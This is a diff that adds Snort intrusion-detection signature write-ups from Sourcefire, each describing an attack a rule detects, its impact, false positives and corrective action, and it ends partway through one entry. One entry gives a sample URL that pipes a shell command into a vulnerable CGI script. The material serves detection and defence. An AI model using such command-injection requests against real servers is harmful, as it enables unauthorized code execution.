+Attack Scenarios:
+An attacker may attempt to list the exported NFS file systems as a precursor to mounting them to read or change a specific file. 
+
+--
+Ease of Attack:
+Simple.   
+
+--
+False Positives:
+If a legitimate remote user is allowed to list exported NFS file systems, this rule may trigger.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+http://www.whitehats.com/info/IDS26
+
+--
--- /dev/null
+++ b/doc/signatures/1944.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1944
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2779.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2779
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_site_priority_site
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2071.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2071
+
+--
+Summary:
+made.
+
+--
+Impact:
+Code execution and possible control of the target machine
+
+--
+Detailed Information:
+Alibaba is a web server that runs on Windows platforms. An error in the 
+cgi script post32.exe allows piped commands to be processed on the 
+server.
+
+--
+Affected Systems:
+Computer Software Manufaktur Alibaba 2.0
+	Microsoft Windows 2000 Workstation
+	Microsoft Windows 95
+	Microsoft Windows 98
+	Microsoft Windows NT 4.0
+   
+--
+Attack Scenarios:
+The attacker merely needs to make an http request to the script using a 
+pipe command at the end of the URI to execute any command he chooses.
+
+For example, http://www.foo.com/cgi-bin/post32.exe|dir%20c:\
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade Alibaba to the latest non vulnerable version if available.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1485
+
+--
--- /dev/null
+++ b/doc/signatures/2369.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+2369
+
+--
+Summary:
+This event is generated when an attempt is made to access ISAPISkeleton.dll on a
+web server. This may indicate an attempt to exploit a cross-site 
+scripting vulnerability in BRS WebWeaver.
+
+--
+Impact:
+Arbitrary code execution, possible session hijack.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a 
+cross-site scripting vulnerability in BRS WebWeaver .
+An attacker can pass an argument to ISAPISkeleton.dll that may contain
+malicious code that could be executed on the victims machine. 
+
+--
+Affected Systems:
+	BRS WebWeaver 
+
+--
+Attack Scenarios:
+An attacker can pass a specific argument to ISAPISkeleton.dll that may
+contain malicious code.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2200.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2200
+
+--
+Summary:
+This event is generated when an attempt is made to access dnewsweb.cgi on an internal web server. This may indicate an attempt to exploit a buffer overflow vulnerability in NetWin DNews News Server 5.3.
+
+--
+Impact:
+Remote execution of arbitrary code, possibly leading to remote root compromise.
+
+--
+Detailed Information:
+NetWin DNews News is a web-based application that manages remote access to Internet newsgroups. When overly long arguments are used as arguments to some dnewsweb.cgi parameters (including but not limited to "group," "cmd," and "utag"), a buffer overflow condition may occur. This can lead to the remote execution of arbitrary code with the security context of DNews. 
+
+--
+Affected Systems:
+Any operating system running NetWin DNews News Server 5.3 or lower.
+
+--
+Attack Scenarios:
+An attacker transmits an overly long, specially crafted URL to the vulnerable DNews server, causing a buffer overflow condition. The attacker is then able to execute arbitrary code on the server with the security context of DNews. 
+
+--
+Ease of Attack:
+Simple. An exploit exists.
+
+--
+False Positives:
+If a legitimate remote user accesses dnewsweb.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to DNews News Server 5.4 or higher.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/1172
+
+--
--- /dev/null
+++ b/doc/signatures/2220.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2220
+
+--
+Summary:
+This event is generated when an attempt is made to access simplestmail.cgi on an internal web server. This may indicate an attempt to exploit a remote command execution vulnerability in Leif M. Wright's Simple Guestbook.
+
+--
+Impact:
+Remote execution of arbitrary code, possibly leading to remote root compromise.
+
+--
+Detailed Information:
+Leif Wright's Simple Guestbook uses a Perl script to manage web-based guestbook submissions. It improperly parses pipe metacharacters (|), allowing an attacker to place arbitrary shell commands between pipe characters in the guestbook value. These commands are then executed by the web server when it receives the request.
+
+--
+Affected Systems:
+Web servers running Leif M. Wright Simple Guestbook.
+
+--
+Attack Scenarios:
+An attacker uses a specially crafted value in the guestbook field between pipe characters. Any commands included in the value are executed with the security context of the web server.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses simplestmail.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable simplestmail.cgi. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/2106
+
+--
--- /dev/null
+++ b/doc/signatures/3237.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3237
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1315.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1315
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "hot young sex".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "hot young sex".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/2502.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2502
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/146.txt
@@ -0,0 +1,95 @@
+Rule:
+
+--
+Sid:
+146
+
+--
+Summary:
+Netsphere is a Trojan Horse offering the attacker access to the victims 
+filesystem, instant messaging clients and some control over peripherals.
+This event is generated when a Netsphere server responds to an attackers
+client.
+
+--
+Impact:
+Compromise of data integrity on the victim host as well as the 
+possibility of rendering the machine temporarily unusable.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Netsphere
+sever to programs normally started on boot. Due to the nature of this
+Trojan it is unlikely that the attacker's client IP address has been
+spoofed.
+
+The Trojan also gives the attacker the ability to access the victims 
+filesystem, turn the monitor on and off, control the mouse, access 
+instant messaging applications and render a pentium based machine 
+unusable.
+
+The Trojan is also known to use TCP ports 30100, 30101 and 30102.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is named NetSphereServer.exe.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	NSSX
+
+Removal of this entry is required.
+
+Delete the file NetSphereServer.exe.
+
+Ending the Trojan process is also necessary. A reboot of the infected
+machine is recommended.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS76
+
+--
--- /dev/null
+++ b/doc/signatures/3129.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3129
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/827.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+827
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000791.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000791
+--
+Summary:
+This event is generated when an attempt is made to access the file "pv_core.php which contains known vulnerabilities in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access a file with known vulnerabilities from a remote machine used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1928.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid: 
+1928
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic 
+is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp 
+server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of
+spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or 
+it could be an attempt to compromise the FTP server by overflowing a 
+buffer in the FTP daemon or service.
+
+In this case, the rule will generate an event due to the attempted
+transfer of a shadow file. This file is generally used on muli-user
+systems to provide greater security for user passwords. This file should
+only be readable by the super user.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party 
+using FTP. Retrieval of the shadow file may allow a user to crack the
+encryption scheme used and gain unauthorized access to the host.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain 
+access to a host, then upload a Trojan Horse program to gain control of 
+that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected 
+network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000814.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000814
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SimpleBoard SBP" application running on a webserver. Access to the file "image_upload.php" using a remote file being passed as the "sbp" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "sbp" parameter in the "image_upload.php" script used by the "SimpleBoard SBP" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SimpleBoard SBP
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/593.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+593
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) snmpXdmi is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port snmpXdmi is using.  Attackers can also learn what versions of the snmpXdmi protocol are accepted by snmpXdmi.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as snmpXdmi run.  Simple Network Management Protocol (SNMP) and Desktop Management Interface (DMI) are remote management protocols.  The snmpXdmi RPC service translates between SNMP and DMI, allowing the use of either or both.  There is a buffer overflow when translating DMI to SNMP that allows access with the privilege level of snmpXdmi.
+
+--
+Affected Systems:
+Sun Solaris 2.6, 7.0, and 8.0.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where snmpXdmi runs.  This may be a precursor to accessing snmpXdmi.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access snmpXdmi, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for snmpXdmi, not probes of the snmpXdmi service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the snmpXdmi service itself. An attacker may attempt to go directly to the snmpXdmi port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0236
+
+CERT
+http://www.cert.org/advisories/CA-2001-05.html
+
+Bugtraq
+http://www.securityfocus.com/bid/2417
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/2372.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+2372
+
+--
+Summary:
+This event is generated when an attempt is made to access showphoto.php, a 
+component of the Photopost PHP web application running on a server.
+
+--
+Impact:
+Unauthorized administrative access to the underlying database.
+
+--
+Detailed Information:
+Photopost is a PHP photo gallery application. It is possible for a
+remote attacker to perform SQL queries on the database used by Photopost
+that could disclose sensitive information or compromise the data stored
+on the server.
+
+--
+Affected Systems:
+	Photopost PHP Pro version 4.6 and earlier
+
+--
+Attack Scenarios:
+An attacker can manipulate the photo parameter in the script
+showphoto.php to perform SQL queries of their choosing.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <matthew.watchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000780.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000780
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Horde" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "name" parameter in the "problem.php" script used by the "Horde" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Horde
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Dan Raswami <dan.raswami@sourcefire.com>
+
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2381.txt
@@ -0,0 +1,65 @@
+Rule:  
+
+--
+Sid:
+2381
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Checkpoint Firewall-1
+
+--
+Impact:
+Serious. Unauthorized administrative access to the firewall
+
+--
+Detailed Information:
+A vulnerability exists in Checkpoint Firewall-1 that may allow a remote
+attacker to gain control of the firewall. The issues lies in the
+handling of HTTP requests by the Security Server and Application
+Intelligence modules of the Firewall's administration console.
+
+By supplying a malformed scheme in a URI an attacker may present the
+attacker with the opportunity to send data of their choosing to the
+sprintf() system call.
+
+--
+Affected Systems:
+	Checkpoint Firewall-1
+	
+--
+Attack Scenarios:
+An attacker must supply specially crafted packets containing malformed
+URI schema with the data they wish to send to the sprintf() function.
+This may then present the attacker with administrative privileges on the
+server.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Disallow external access to the Firewall-1 administrative interface.
+
+Disable the Web interface to the firewall if possible
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/122-11.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-11
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically an ip
+protocol sweep was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/636.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+636
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain 
+which ports a host may be listening on, whether or not the ports are 
+filtered by a firewall and if the host is vulnerable to a particular 
+exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. 
